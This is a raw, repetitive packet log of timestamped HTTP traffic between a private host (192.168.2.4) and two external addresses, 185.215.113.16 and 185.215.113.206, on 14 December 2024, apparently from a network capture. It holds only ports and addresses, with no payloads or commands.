Dec 14, 2024 12:56:34.627177000 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.627227068 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.628293037 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.628333092 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.628350973 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.628382921 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.629424095 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.629509926 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.629554033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.629609108 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.630609035 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.630670071 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.630706072 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.630776882 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.631799936 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.631958008 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.632019997 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.632978916 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.633033037 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.633035898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.633086920 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.634162903 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:34.634329081 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.634387970 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.634430885 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.634484053 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.635335922 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.635392904 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.635482073 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.635538101 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.636483908 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.636539936 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.636610985 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.636663914 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.637664080 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.637722015 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.637808084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.637888908 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.638861895 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.638911009 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.639059067 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.639162064 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.640090942 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.640144110 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.640153885 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.640188932 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.641237020 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.641273022 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.641478062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.641478062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.642375946 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.642431974 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.642529011 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.642582893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.643568993 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.643625975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.643672943 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.643727064 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.644836903 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.644893885 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.644953966 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.645020962 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.645915031 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.645984888 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.645999908 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.646029949 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.647077084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.647128105 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.647201061 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.647267103 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.648359060 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.648411989 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.648416996 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.648639917 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.649476051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.649538040 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.649563074 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.649611950 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.650624037 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.650686979 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.650759935 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.650815010 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.651813984 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.651890993 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.651951075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.652005911 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.652966976 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.653018951 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.653107882 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.653162003 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.654174089 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.654226065 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.654262066 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.654308081 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.785320997 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.785449028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.785514116 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.785878897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.785964012 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.786082029 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.786145926 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.787076950 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.787139893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.787164927 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.787215948 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.788263083 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.788321972 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.788388968 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.788439035 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.789392948 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.789449930 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.789504051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.789556026 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.790852070 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.790887117 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.790915012 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.790945053 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.791760921 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.791824102 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.791886091 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.791939020 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.792931080 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.793062925 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.793102026 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.793133974 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.794080973 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.794137955 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.794209957 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.794275045 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.795286894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.795356035 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.795413971 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.795480013 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.796473980 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.796549082 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.796592951 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.796644926 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.797621012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.797688961 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.797746897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.797802925 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.798798084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.798854113 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.798939943 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.798991919 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.799988985 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.800051928 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.800121069 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.800600052 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.801148891 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.801206112 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.801287889 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.801342010 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.802367926 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.802433014 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.802491903 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.802550077 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.803559065 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.803625107 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.803808928 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.803921938 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.804685116 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.804745913 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.804819107 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.804872036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.805883884 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.805939913 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.806011915 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.806066036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.807133913 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.807184935 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.807241917 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.808240891 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.808304071 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.808358908 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.808415890 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.809402943 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.809457064 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.809504986 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.809557915 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.810616016 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.810682058 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.810741901 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.810796976 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.811892033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.811953068 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.811984062 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.812066078 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.812927961 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.813065052 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.813083887 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.813114882 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.814142942 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.814201117 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.814249992 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.814304113 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.815289021 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.815344095 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.815416098 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.815469980 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.817575932 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.817611933 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.817646027 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.817667961 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.817713976 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.817748070 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.817775011 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.817795992 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.818816900 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.818980932 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.819050074 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.823461056 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.823509932 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.823545933 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.823549032 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.823575974 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.823580027 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.823596954 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.823633909 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.823642015 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.823668957 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.823685884 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.823704004 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.823724031 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.823740959 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.823760986 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.823796988 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.824723005 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.824783087 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.824832916 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.824899912 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.825874090 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.825926065 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.825983047 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.827069044 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.827195883 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.827233076 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.827263117 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.828246117 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.828310013 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.828397989 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.828481913 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.829463959 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.829552889 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.829602003 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.829670906 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.830588102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.830651999 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.830724001 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.830873966 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.831792116 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.831856966 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.831927061 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.831999063 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.832942963 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.833002090 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.833066940 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.833122969 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.834151983 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.834217072 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.834275961 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.834331989 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.835306883 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.835375071 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.835437059 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.835498095 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.836510897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.836570978 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.836642027 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.836699009 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.837652922 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.837713003 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.837837934 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.837892056 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.838875055 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.838934898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.839078903 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.839140892 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.840014935 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.840070009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.840127945 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.841178894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.841242075 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.841327906 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.841378927 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.842371941 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.842529058 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.842586994 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.843569040 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.843641043 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.843684912 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.843744040 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.844748020 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.844799995 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.844808102 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.844849110 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.845880985 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.845938921 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.846012115 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.846065044 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.847012997 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.848208904 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.961358070 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:34.961426020 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:34.977459908 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.977516890 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.977535009 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.977567911 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.977986097 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.978130102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.978188992 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.979181051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.979286909 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.979341984 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.980376005 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.980442047 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.980493069 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.980551958 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.981535912 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.981589079 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.981590986 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.981636047 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.982711077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.982768059 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.982831001 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.982881069 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.983876944 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.983928919 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.983983994 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.984040976 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.985075951 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.985130072 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.985215902 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.985361099 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.986260891 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.986318111 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.986366034 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:34.986417055 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:34.987230062 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:34.987279892 CET	49834	80	192.168.2.4	185.215.113.206
